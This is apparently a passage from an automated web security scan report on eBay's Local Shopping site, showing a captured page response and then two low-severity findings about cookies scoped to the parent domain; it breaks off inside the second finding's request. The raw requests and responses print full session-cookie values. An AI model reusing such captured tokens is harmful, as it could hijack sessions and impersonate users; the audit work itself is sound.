vjo.darwin.globalnav.util.EventReg.browseCategories("BrowseCategoriesMenu", "http://include.ebaystatic.com/categoryjs/99/en_US_MAIN/category_99en_US_MAIN0.js");
vjo.darwin.globalnav.util.EventReg.impression("AHtMRZjo*");
</script><script type="text/javascript">vjo.darwin.globalnav.util.DoctypeSupport.init();</script><script type="text/javascript">var _oGlobalNavRTMInfo={};_oGlobalNavRTMInfo.aRTMPlacementData=[];_oGlobalNavRTMInfo.aRTMPlacementData=[{"ord":null,"maxWidth":"470","renderOnScroll":false,"rtmUrl":"http://srx.main.ebayrtm.com/rtm","userId":null,"htmlId":"rtm_html_433","GUid":null,"renderOnLoadAndScroll":false,"maxHeight":"22","pid":"433","isUserSignin":false,"renderOnLoadAndScrollSiteSpeed":false,"renderBeforeOnload":true},{"ord":null,"maxWidth":"160","renderOnScroll":false,"rtmUrl":"http://srx.main.ebayrtm.com/rtm","userId":null,"htmlId":"rtm_html_876","GUid":null,"renderOnLoadAndScroll":false,"maxHeight":"22","pid":"876","isUserSignin":false,"renderOnLoadAndScrollSiteSpeed":false,"renderBeforeOnload":true},{"ord":null,"maxWidth":"160","renderOnScroll":false,"rtmUrl":"http://srx.main.ebayrtm.com/rtm","userId":null,"htmlId":"rtm_html_912","GUid":null,"renderOnLoadAndScroll":false,"maxHeight":"22","pid":"912","isUserSignin":false,"renderOnLoadAndScrollSiteSpeed":false,"renderBeforeOnload":true},{"ord":null,"maxWidth":"470","renderOnScroll":false,"rtmUrl":"http://srx.main.ebayrtm.com/rtm","userId":null,"htmlId":"rtm_html_1650","GUid":null,"renderOnLoadAndScroll":false,"maxHeight":"22","pid":"1650","isUserSignin":false,"renderOnLoadAndScrollSiteSpeed":false,"renderBeforeOnload":false},{"ord":null,"maxWidth":"470","renderOnScroll":false,"rtmUrl":"http://srx.main.ebayrtm.com/rtm","userId":null,"htmlId":"rtm_html_1651","GUid":null,"renderOnLoadAndScroll":false,"maxHeight":"22","pid":"1651","isUserSignin":false,"renderOnLoadAndScrollSiteSpeed":false,"renderBeforeOnload":false}];</script><!--@sghp@ headerStyle=HALF:HOMEPAGE:CGI @eghp@--><div id="CenterPanel" class="cntr"><div class="cont" style="margin-left:0">


<div class="srpbx" id="srpbx">
   <div class="srpbxLft">
   </div>

   <div style="padding:10px 10px 10px 25px"><span style="font-weight:bold;font-size:24px;color:#2F50BC;">Local Shopping <sup style="font-size:11px;color:#000">Beta</sup></span>
       <div style="font:normal small arial;padding-top:5px">Need it fast? Find what you're looking for in a store near you.</div>
   </div>
<!--    <div>
        <div class="srplb">Search locally to find the best deals in your area... <span class="rt">Right now, on eBay</span></div>
   </div>
-->    
   <div style="margin-left:-72px;z-index:5;position:relative;">
       <form action="/local/localsch.html" method="get" id="schfrm" onsubmit="return vjo.ebay.local.localmap.LocalMap.onSubmit();">
           <div class="fm-cnt">
               <div class="srps">
                   <input type="submit" id="but" value="Search" class="srpbt" tabindex="2" />
               </div>
               <div class="srpi">
                   <input type="text" id="searchbox" name="_nkw" placeholder="Search locally " autofocus="autofocus" autocomplete="off" tabindex="1" />
               </div>
               <div>                    
                       <span class="near-txt">Near</span><input class="zipcode" autocomplete="off" name="_location" id="_location" value="75217" size="50" title="Enter Location" tabindex="3" placeholder="Enter valid U.S ZIP Code">
                       <div id="autocomplete" class="autocomplete"></div>                        
                   
                       <a href="javascript:;" title="Change Location" type="change" id="loc_change" tabindex="4">Change</a>
                   <span id="err" style="display:none;color:red">Could not find the location.</span>
                   &nbsp;<a href="javascript:;" id="resetloc" style="">| <span>Current Location</span></a>
                   
                   <div class="clr"></div>
               </div>
               <div class="clr"></div>
           </div>
           
           <fontT><div class="srpMar"><b></b><span>Over 50,000 local stores including:</span>
           <span class="ff">
               <span class="fs" id="merchantFs">
           <span class="preS"><a class="pre db" id="pre" href="javascript:;" tabindex="6"></a></span>
       <div class="cntWrap" id="cntWrap1" style="width:252px;overflow:hidden">
    <div class="cnt" id="cnt1" style="width:10000px"><img title="Fry's Electronics" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/3040.png"><img title="Best Buy" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/1779.png"><img title="Sears" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/1609.png"><img title="Micro Center" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/3713.png"><img title="Target" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/1792.png"><img title="Staples" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/1825.png"><img title="Armani Exchange" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/12863.png"><img title="Loft" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/12843.png"><img title="Sunglass Hut" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/12850.png"><img title="JCPenney" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/6740.png"><img title="Nordstrom" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/10390.png"><img title="Ikea" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/8615.png"><img title="Golf Smith" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/5461.png"><img title="Office Depot" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/1848.png"><img title="Toys R Us" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/5893.png"><img title="RadioShack" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/1829.png"><img title="Container Store" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/12861.png"><img title="Guitar Center" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/7374.png"><img title="Macy's" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/10617.png"><img title="GameStop" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/9386.png"><img title="Lowe's" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/4483.png">
    </div>
       </div><span class="nextS"><a class="next enab " id="next" href="javascript:;" tabindex="7"></a></span>
       <div class="clr"></div>
               </span>
           </span>
           </div><fontT>
           <input type="hidden" id="_fpos" name="_fpos" value="75217">
           
               <input type="hidden" id="_trksid" name="_trksid" value="p5791.m1">
           
       </form>
   </div>
   <input type="hidden" id="zip" value="75217">
   
   <div style="position:absolute;right:25px;top:30px;color:#333;display:none;" id="loading"><span>Loading </span><img src="/local/images.i?file=miniThrobber.gif" /></div>
   
   
</div>    

<div id="map_canvas" class="mainmap"></div>

</div></div><div id="linfo" class="loc-info">    
   
   <div>
                               <div class="loc-ttl">
                                   <fontt><a id="ecArr" href="javascript:;"><b></b></a></fontt>
                               </div>
                               <div style="position: absolute; font-size: 10px; right: 10px;">Pricing &amp; inventory <a href="/local/disclaimer.html" target="blank">subject to Terms</a></div>
                               <div id="cntWrapper" class="loc-cntW">
                                   <table id="cntDiv" class="loc-cnt" style="width: 100%;table-layout:fixed" cellpadding="0" cellspacing="0">
                                   <tbody><tr>
                                   
                                       <td class="loc-tkt" align='center' >
                                           <div class="loc-cntTtl" >Popular Products</div>
                                           <div id="fsWrp1" class="loc-fsW" style="min-width:872px;max-width:1136px;" >
                                               <a id="fsLa1" href="javascript:;" class="loc-fsA loc-fsLd"></a>
                                               <div class="rImg">
                                                   <div id="fsCnt1" class="loc-fsCnt" style="min-width:872px;max-width:1136px;" >
                                                       <div id="fsDiv1" class="loc-fsItmW">
                                                       <div class="dealWrap" id="17443215" coords="32.9274,-96.814,1792,http://static.milo.com/20111201145320/images/store_icons/flat_by_id/1792.png">
<img class="dealImg" src="http://imagethumbnails.milo.com/011/712/338/200/11712723_18506338_200.jpg" />
<div class="rCnt"><div class="ttl">
<a href="http://www.ebay.com/ctg/mp.html?_flppid=17443215&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m1" target="_blank" title='Liv Doll Dancing Sophie'>Liv Doll Dancing Sophie</a>
</div><div class="price"><span class="price">$16.99</span>
</div>
</div>
<div class="clr"></div></div><div class="dealWrap" id="11348278" coords="32.874857,-96.76977,5893,http://static.milo.com/20111201145320/images/store_icons/flat_by_id/5893.png">
<img class="dealImg" src="http://imagethumbnails.milo.com/011/032/583/200/11032509_14715583_200.jpg" />
<div class="rCnt"><div class="ttl">
<a href="http://www.ebay.com/ctg/mp.html?_flppid=11348278&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m1" target="_blank" title='Nerf Vortex Tech Kit'>Nerf Vortex Tech Kit</a>
</div><div class="price"><span class="price">$9.99<span class="sep">-</span>$12.99</span>
</div>
</div>
<div class="clr"></div></div><div class="dealWrap" id="19540378" coords="32.931615,-96.821136,1779,http://static.milo.com/20111201145320/images/store_icons/flat_by_id/1779.png">
<img class="dealImg" src="http://imagethumbnails.milo.com/014/413/154/200/14413257_18418154_200.jpg" />
<div class="rCnt"><div class="ttl">
<a href="http://www.ebay.com/ctg/mp.html?_flppid=19540378&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m1" target="_blank" title='NERF - Vortex Vigilon Blaster'>NERF - Vortex Vigilon Blaster</a>
</div><div class="price"><span class="price">$17.99</span>
</div>
</div>
<div class="clr"></div></div><div class="dealWrap" id="1361763" coords="32.868267,-96.775289,10390,http://static.milo.com/20111201145320/images/store_icons/flat_by_id/10390.png">
<img class="dealImg" src="http://imagethumbnails.milo.com/000/828/336/200/828795_2428336_200.jpg" />
<div class="rCnt"><div class="ttl">
<a href="http://www.ebay.com/ctg/mp.html?_flppid=1361763&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m1" target="_blank" title='UGG.. Australia 'Byron' Slipper (Men)'>UGG.. Australia 'Byron' Slipper (Men)</a>
</div><div class="price"><span class="price">$129.95</span>
</div>
</div>
<div class="clr"></div></div><div class="dealWrap" id="18580560" coords="32.7203,-96.8303,1829,http://static.milo.com/20111201145320/images/store_icons/flat_by_id/1829.png">
<img class="dealImg" src="http://imagethumbnails.milo.com/012/612/215/200/12612975_17176215_200.jpg" />
<div class="rCnt"><div class="ttl">
<a href="http://www.ebay.com/ctg/mp.html?_flppid=18580560&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m1" target="_blank" title='Air Hogs.. RC Pocket Copter...'>Air Hogs.. RC Pocket Copter...</a>
</div><div class="price"><span class="price">$19.99</span>
</div>
</div>
<div class="clr"></div></div><div class="dealWrap" id="12171471" coords="32.91079,-96.95881,9386,http://static.milo.com/20111201145320/images/store_icons/flat_by_id/9386.png">
<img class="dealImg" src="http://imagethumbnails.milo.com/010/824/726/200/10824080_16054726_200.jpg" />
<div class="rCnt"><div class="ttl">
<a href="http://www.ebay.com/ctg/mp.html?_flppid=12171471&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m1" target="_blank" title='Call of Duty Modern Warfare 3 for Nintendo Wii'>Call of Duty Modern Warfare 3 for Nintendo Wii</a>
</div><div class="price"><span class="price">N/A</span>
</div>
</div>
<div class="clr"></div></div>
                                                       </div>
                                                   </div>
                                               </div>
                       
                                               <a id="fsRa1" href="javascript:;" class="loc-fsA loc-fsRa"></a>
                                           </div>
                                       </td>
                                   
                                   
                               </tr>
                           </table>
                       </div>
                   </div>
</div><div class="footer"><div class="coreFooterLinks" id="glbfooter"><div><div id="rtm_html_1650"></div><div id="rtm_html_1651"></div></div><table border="0" cellpadding="0" cellspacing="0" width="100%"><tr class="g-hlp" valign="top"><td class="g-nav coreFooterLegalNotice">Copyright .. 1995-2012 eBay Inc. All Rights Reserved. Designated trademarks and brands are the property of their respective owners. Use of this Web site constitutes acceptance of the eBay <a href="http://pages.ebay.com/help/policies/user-agreement.html?rt=nc" _sp="m571.l2612">User Agreement</a> and <a href="http://pages.ebay.com/help/policies/privacy-policy.html?rt=nc" _sp="m571.l2613">Privacy Policy</a>.<br><img src="http://q.ebaystatic.com/aw/pics/s.gif" height="20" alt=""></td></tr></table><div id="cobrandFooter"></div></div><script type="text/javascript">var _GlobalNavHeaderStatic=false, _GlobalNavHeaderCookieTracking=true, _GlobalNavHeaderSrcPageId=3872; var un="undefined";if(typeof(vjo)!=un && typeof(vjo.darwin)!=un && typeof(vjo.darwin.globalnav)!=un) vjo.darwin.globalnav.util.SGuid.writeSessionGuid("ab1ed36f1340a03663a54955ff73ced6");vjo.darwin.core.ebayheader.rover.FooterRover.roverService("http://rover.ebay.com/idmap/0?footer");; if(vjo && vjo.darwin && vjo.darwin.globalnav && vjo.darwin.globalnav.rtm && vjo.darwin.globalnav.rtm.GlobalHeaderRtmCall)vjo.darwin.globalnav.rtm.GlobalHeaderRtmCall.submitRTMCall("http://ir.ebaystatic.com/v4js/z/ur/grupfpzzoq4wjpypydpyjswhd.js");</script><script src="http://include.ebaystatic.com/js/e687/us/ebayfooter_cobrand_v4_e6871us.js"></script><!--@sgfp@ footerStyle=MIN:CGI @egfp@--></div></div><script type="text/javascript" src="http://maps.googleapis.com/maps/api/js?v=3.4&amp;client=gme-ebayinc1&amp;sensor=true"></script><script src="/local/localjs.js"></script><script type="text/javascript">var distances = new Array(0.5, 1, 2, 5, 10, 15, 20, 25, 50, 100);
var _sadis = document.getElementById("_flprad");
// locSliderGetElementByID: Cross-browser version of "document.getElementById()"
function locSliderGetElementById(element) {
   if (document.getElementById) element = document.getElementById(element);
   else if (document.all) element = document.all[element];
   else element = null;
   return element;
}

// locSliderLeft: Cross-browser version of "element.style.left"
function locSliderLeft(elmnt, pos) {
   if (!(elmnt = locSliderGetElementById(elmnt))) return 0;
   if (elmnt.style && (typeof(elmnt.style.left) == 'string')) {
       if (typeof(pos) == 'number') elmnt.style.left = pos + 'px';
       else {
           pos = parseInt(elmnt.style.left);
           if (isNaN(pos)) pos = 0;
       }
   }
   else if (elmnt.style && elmnt.style.pixelLeft) {
       if (typeof(pos) == 'number') elmnt.style.pixelLeft = pos;
       else pos = elmnt.style.pixelLeft;
   }
   return pos;
}

function setPos (distance) {
   var index = 0;
   /*for(var i=0,l=distances.length;i<l; i++){
       if(distance == distances[i]) {
           index = i;
           break;
       }
   }
   var pos = locSliderLeft("slider", (index*12.8)+6);
   document.getElementById("display").innerHTML = distance + " miles"; // put the new value in the slider display element
   document.getElementById("progress").style.width = (pos+30)+"px";*/
   _sadis.value = distance;
}
// slide: Handles the start of a slider move.
function slide(evnt, slider, left, right, display, progress, progressOffset) {
   if (!evnt) {
evnt = window.event;
   }
   sliderObj = locSliderGetElementById(slider);
   displayObj = locSliderGetElementById(display);
   progressObj = locSliderGetElementById(progress);
   progressObjOffset = progressOffset
   xLeft = left;
   xRight = right;
   pxLeft = locSliderLeft(sliderObj.id);
   xStart = evnt.screenX; // Horizontal mouse position at start of slide.
   mouseover = true;
   document.onmousemove = moveSlider; // Start the action if the mouse is dragged.
   document.onmouseup = sliderMouseUp; // Stop sliding.
}

// moveSlider: Handles slider and display while dragging
function moveSlider(evnt) {
   var evnt = (!evnt) ? window.event : evnt; // The mousemove event
   if (mouseover) { // Only if slider is dragged
       x = pxLeft + evnt.screenX - xStart; // Horizontal mouse position relative to allowed slider positions
       // Limit horizontal movement
       if (x > xRight) {
       x = xRight;
       }
       if (x < xLeft) {
        x = xLeft;
       }
       locSliderLeft(sliderObj.id, x); // move slider to new horizontal position
       distance = distances[Math.min(Math.round((x - xLeft) * distances.length / (xRight - xLeft)), distances.length - 1)]; // distance selection
       displayObj.innerHTML = distance + " miles"; // put the new value in the slider display element
       _sadis.value = distance;

       progressObj.style.width = (x + progressObjOffset - xLeft) + "px";
       
       return false
   }
   return
}
// sliderMouseup: Handles the mouseup event after moving a slider.
// Snaps the slider position to allowed/displayed value.
function sliderMouseUp() {
   mouseover = false // Stop the sliding.
   if (document.removeEventListener) { // Remove event listeners from 'document' (Mozilla).
       document.removeEventListener('mousemove', moveSlider, false)
       document.removeEventListener('mouseup', sliderMouseUp, false)
   }
   else if (document.detachEvent) { // Remove event listeners from 'document' (IE).
       document.detachEvent('onmousemove', moveSlider)
       document.detachEvent('onmouseup', sliderMouseUp)
   }
   //document.distanceForm.submit();
   submitDistance();
}

function submitDistance(){
   var t=this, zip = document.getElementById("_fpos"),zipName,disName;
   if(!zip || (zip && !(zipName=zip.getAttribute("name"))) || !_sadis ||(_sadis && !(disName=_sadis.getAttribute("name")))) return;
   var url = document.location.href;
   if(zipName == '_fpos') {
       var value = zip.value;
       url = vjo.dsf.utils.URL.addArg(url, '_fpos', value);
   }
   if(disName == '_flprad') {
       var value1 = _sadis.value;
       url = vjo.dsf.utils.URL.addArg(url, '_flprad', value1);
   }else {
       return;
   }        
   window.location = url;
   }

</script><script type="text/javascript">(function () {
var _r = vjo.Registry;
_r.put('0',new vjo.dsf.utils.SiteSpeed()); })();
(function(){
var _d=vjo.dsf.EventDispatcher;
var _r=vjo.Registry;
_d.add('body','load',function(event) { this.setData({"placeholder":"Enter valid U.S ZIP Code","jsId":"merFs","trkId":"p5791.m1","data":{"numResults":0,"localPickupModel":null,"errorMap":null,"noProductFound":false,"location":"75217","deals":[{"highPrice":null,"highPriceValue":null,"productId":19785395,"ratingModel":{"reviewOnclick":null,"microDataEnabled":false,"redirectUrl":null,"darkBackground":false,"firstReviewUrl":null,"reviewCount":27,"reviewUrl":null,"redesignedWAR":false,"redesignedReviews":false,"userSignedIn":false,"rating":{"value":9,"id":9,"name":"5","integer":9},"WARLayerOnLoad":false},"noPriceIn":false,"url":"http://www.ebay.com/ctg/mp.html?_flppid=19785395&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m1","zeroReviews":false,"imageUrl":"http://imagethumbnails.milo.com/014/669/577/200/14669391_19683577_200.jpg","lowPrice":{"valueInMinorUnits":1299,"currency":{"iso4217DigitCode":840,"value":840,"decimals":2,"iso4217DigitCodeString":"840","symbol":"$","symbolPrefix":true,"id":840,"name":"USD","currencyId":1,"maxAmount":99999999,"code":"USD","integer":840},"internalValue":12990000,"negative":false,"zero":false,"currencySymbol":"$","positive":true,"wholeNumberInMajorUnits":false},"reviewCount":27,"title":"St. John's Bay.. Suede Slipper, Mens Dale Moccasin","offerIds":"14669391","numLocalStore":1,"lowPriceValue":"$12.99","miloProductOfferModel":[{"merchantTitle":"JCPenney","merchantId":6740,"linkUrl":null,"location":{"merchantName":"JCPenney","latitude":32.605204,"merchantLogoUrl":"http://milo.com/images/stores/6740.jpg","longitude":-96.929276},"RTPalUrl":null,"price":{"valueInMinorUnits":1299,"currency":{"iso4217DigitCode":840,"value":840,"decimals":2,"iso4217DigitCodeString":"840","symbol":"$","symbolPrefix":true,"id":840,"name":"USD","currencyId":1,"maxAmount":99999999,"code":"USD","integer":840},"internalValue":12990000,"negative":false,"zero":false,"currencySymbol":"$","positive":true,"wholeNumberInMajorUnits":false},"merchantLogoUrl":"http://static.milo.com/20111201145320/images/store_icons/flat_by_id/6740.png"}],"ratingNode":"<span class=\"rw\" style=\"height: 12px; background-position: 0pt -10px;\">\n <span class=\"rstar\" style=\"height: 12px; background-position: 0pt 1px; width: 67.5px\"><\/span>\n<\/span><span class=\"revCnt\">(27)<\/span>"},{"highPrice":null,"highPriceValue":null,"productId":18792100,"ratingModel":{"reviewOnclick":null,"microDataEnabled":false,"redirectUrl":null,"darkBackground":false,"firstReviewUrl":null,"reviewCount":0,"reviewUrl":null,"redesignedWAR":false,"redesignedReviews":false,"userSignedIn":false,"rating":null,"WARLayerOnLoad":false},"noPriceIn":false,"url":"http://www.ebay.com/ctg/mp.html?_flppid=18792100&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m1","zeroReviews":true,"imageUrl":"http://imagethumbnails.milo.com/013/348/303/200/13348508_16910303_200.jpg","lowPrice":{"valueInMinorUnits":999,"currency":{"iso4217DigitCode":840,"value":840,"decimals":2,"iso4217DigitCodeString":"840","symbol":"$","symbolPrefix":true,"id":840,"name":"USD","currencyId":1,"maxAmount":99999999,"code":"USD","integer":840},"internalValue":9990000,"negative":false,"zero":false,"currencySymbol":"$","positive":true,"wholeNumberInMajorUnits":false},"reviewCount":0,"title":"Mukluk Peace Toggle Slippers","offerIds":"13348508","numLocalStore":1,"lowPriceValue":"$9.99","miloProductOfferModel":[{"merchantTitle":"Journeys","merchantId":12845,"linkUrl":null,"location":{"merchantName":"Journeys","latitude":32.845595,"merchantLogoUrl":"http://milo.com/images/stores/12845.jpg","longitude":-96.969233},"RTPalUrl":null,"price":{"valueInMinorUnits":999,"currency":{"iso4217DigitCode":840,"value":840,"decimals":2,"iso4217DigitCodeString":"840","symbol":"$","symbolPrefix":true,"id":840,"name":"USD","currencyId":1,"maxAmount":99999999,"code":"USD","integer":840},"internalValue":9990000,"negative":false,"zero":false,"currencySymbol":"$","positive":true,"wholeNumberInMajorUnits":false},"merchantLogoUrl":"http://static.milo.com/20111201145320/images/store_icons/flat_by_id/12845.png"}],"ratingNode":null},{"highPrice":null,"highPriceValue":null,"productId":9156091,"ratingModel":{"reviewOnclick":null,"microDataEnabled":false,"redirectUrl":null,"darkBackground":false,"firstReviewUrl":null,"reviewCount":6,"reviewUrl":null,"redesignedWAR":false,"redesignedReviews":false,"userSignedIn":false,"rating":{"value":9,"id":9,"name":"5","integer":9},"WARLayerOnLoad":false},"noPriceIn":false,"url":"http://www.ebay.com/ctg/mp.html?_flppid=9156091&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m1","zeroReviews":false,"imageUrl":"http://imagethumbnails.milo.com/010/319/133/200/10319061_13235133_200.jpg","lowPrice":{"valueInMinorUnits":998,"currency":{"iso4217DigitCode":840,"value":840,"decimals":2,"iso4217DigitCodeString":"840","symbol":"$","symbolPrefix":true,"id":840,"name":"USD","currencyId":1,"maxAmount":99999999,"code":"USD","integer":840},"internalValue":9980000,"negative":false,"zero":false,"currencySymbol":"$","positive":true,"wholeNumberInMajorUnits":false},"reviewCount":6,"title":"Cinderella's Enchanted Slipper Game","offerIds":"10319061","numLocalStore":1,"lowPriceValue":"$9.98","miloProductOfferModel":[{"merchantTitle":"Toys\"R\"Us","merchantId":5893,"linkUrl":null,"location":{"merchantName":"Toys\"R\"Us","latitude":32.874857,"merchantLogoUrl":"http://milo.com/images/stores/5893.jpg","longitude":-96.76977},"RTPalUrl":null,"price":{"valueInMinorUnits":998,"currency":{"iso4217DigitCode":840,"value":840,"decimals":2,"iso4217DigitCodeString":"840","symbol":"$","symbolPrefix":true,"id":840,"name":"USD","currencyId":1,"maxAmount":99999999,"code":"USD","integer":840},"internalValue":9980000,"negative":false,"zero":false,"currencySymbol":"$","positive":true,"wholeNumberInMajorUnits":false},"merchantLogoUrl":"http://static.milo.com/20111201145320/images/store_icons/flat_by_id/5893.png"}],"ratingNode":"<span class=\"rw\" style=\"height: 12px; background-position: 0pt -10px;\">\n <span class=\"rstar\" style=\"height: 12px; background-position: 0pt 1px; width: 67.5px\"><\/span>\n<\/span><span class=\"revCnt\">(6)<\/span>"}],"title":"","trkId":null,"localLandingLeftNavModel":null,"numOfResults":0,"topProducts":[{"highPrice":null,"highPriceValue":null,"productId":17443215,"ratingModel":{"reviewOnclick":null,"microDataEnabled":false,"redirectUrl":null,"darkBackground":false,"firstReviewUrl":null,"reviewCount":0,"reviewUrl":null,"redesignedWAR":false,"redesignedReviews":false,"userSignedIn":false,"rating":null,"WARLayerOnLoad":false},"noPriceIn":false,"url":"http://www.ebay.com/ctg/mp.html?_flppid=17443215&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m1","zeroReviews":true,"imageUrl":"http://imagethumbnails.milo.com/011/712/338/200/11712723_18506338_200.jpg","lowPrice":{"valueInMinorUnits":1699,"currency":{"iso4217DigitCode":840,"value":840,"decimals":2,"iso4217DigitCodeString":"840","symbol":"$","symbolPrefix":true,"id":840,"name":"USD","currencyId":1,"maxAmount":99999999,"code":"USD","integer":840},"internalValue":16990000,"negative":false,"zero":false,"currencySymbol":"$","positive":true,"wholeNumberInMajorUnits":false},"reviewCount":0,"title":"Liv Doll Dancing Sophie","offerIds":"11712723","numLocalStore":1,"lowPriceValue":"$16.99","miloProductOfferModel":[{"merchantTitle":"Target","merchantId":1792,"linkUrl":null,"location":{"merchantName":"Target","latitude":32.9274,"merchantLogoUrl":"http://milo.com/images/stores/1792.jpg","longitude":-96.814},"RTPalUrl":null,"price":{"valueInMinorUnits":1699,"currency":{"iso4217DigitCode":840,"value":840,"decimals":2,"iso4217DigitCodeString":"840","symbol":"$","symbolPrefix":true,"id":840,"name":"USD","currencyId":1,"maxAmount":99999999,"code":"USD","integer":840},"internalValue":16990000,"negative":false,"zero":false,"currencySymbol":"$","positive":true,"wholeNumberInMajorUnits":false},"merchantLogoUrl":"http://static.milo.com/20111201145320/images/store_icons/flat_by_id/1792.png"}],"ratingNode":null}],"ticketModel":null},"zipcode":"75217"}); },vjo.ebay.local.localmap.LocalMap);_d.add('body','load',function(event) { this.init({"leftFsPages":6,"jsId":"localinfoFs","content":true,"rightFs":false,"rightFsPages":0}); },vjo.ebay.local.localinfo.LocalInfo);_d.add('body','load',function(event) { this.init("75217", "1"); },vjo.ebay.local.LocalLandingPage);})();
</script></body></html><!--RcmdId LocalDomain-dcp,RlogId jh%60djkbkbnmbvfd%60%3C%3Ds%7D%2Bpu56*%3Bc6cb0g-134ac8a4caf-->

2.8. http://local.ebay.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://local.ebay.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
Host: local.ebay.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: dp1=bpbf/%2364002081004200000450e66632^tzo/1684f0540c2^u1p/QEBfX0BAX19AQA**50e66632^idm/14f065eac^; nonsession=CgAAIABxPLL+yMTMyNDc2OTcwNXgzNTA1MTcxMjAxNDN4MHgyTgDKACBYazQyNjdhMzMyZGExMzQwYTAyNzZiODFiOGIxZmZmYzFmNWQAywABTwU5ujQBTAAXUOZmMjRmMDUzMmIyLjAuMS40Ljg2LjEuMC4yUqTkNQ**; lucky9=2930263; npii=btpim/24f053e54^cguid/6796be8f1340a0a9e8e22482fd53d52a50e66acc^tguid/67a332da1340a0276b81b8b1fffc1f5d50e66acc^trm/svid%3D9115901167250e66acc^; cid=yqK7Xb2N; ns1=BAQAAATSWkMoCAAaAANgATFDmZjJjNzJ8NjAxXjEzMjU3Mzk0MDA3MjNeXjFeM3wyfDY1fDV8NHw3XjFeMl40XjNeMTJeMTJeMl4xXjFeMF4xXjBeMV4yMTQ3NDkxNzc5RFgf85+eaYJhTZOcMI/5olA1pyg*
Content-Length: 10






Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
RlogId: jh%60djkbkbnmbvfd%60%3C%3Ds%7D%2Bpu56*%3A37dg%60b-134ac824cbe
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: ebay=%5Ecv%3D15555%5E; Domain=.ebay.com; Path=/
Set-Cookie: dp1=bpbf/%2364002081004200000450e67394^tzo/1684f054e24^u1p/QEBfX0BAX19AQA**50e67394^idm/14f065eac^; Domain=.ebay.com; Expires=Sat, 04-Jan-2014 06:15:47 GMT; Path=/
Set-Cookie: ns1=BAQAAATSWkMoCAAaAANgATFDmc5RjNzJ8NjAxXjEzMjU3Mzk0MDA3MjNeXjFeM3wyfDY1fDV8NHw3XjFeMl40XjNeMTJeMTJeMl4xXjFeMF4xXjBeMV4yMTQ3NDkxNzc5PV/S1GLNY3S17s5QajK0455dMvE*; Domain=.ebay.com; Expires=Fri, 04-Jan-2013 06:15:47 GMT; Path=/
Set-Cookie: s=CgAD4ACBPBpGUYWM4MjRjYmUxMzQwYTAyYTA5NTFmZTYxZmZmZmU0YzDA74MA; Domain=.ebay.com; Path=/
Set-Cookie: nonsession=CgAAIABxPLM0UMTMyNDc2OTcwNXgzNTA1MTcxMjAxNDN4MHgyTgDKACBYa0GUNjdhMzMyZGExMzQwYTAyNzZiODFiOGIxZmZmYzFmNWQAywABTwVHHDEBTAAXUOZzlDRmMDUzMmIyLjAuMS40Ljg2LjEuMC4ypjyuLg**; Domain=.ebay.com; Expires=Fri, 04-Jan-2013 06:15:47 GMT; Path=/
Set-Cookie: lucky9=2930263; Domain=.ebay.com; Expires=Tue, 03-Jan-2017 06:15:47 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 0
Date: Thu, 05 Jan 2012 06:15:47 GMT


2.9. http://local.ebay.com/html  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://local.ebay.com
Path:   /html

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /html HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: local.ebay.com
Accept-Encoding: gzip, deflate
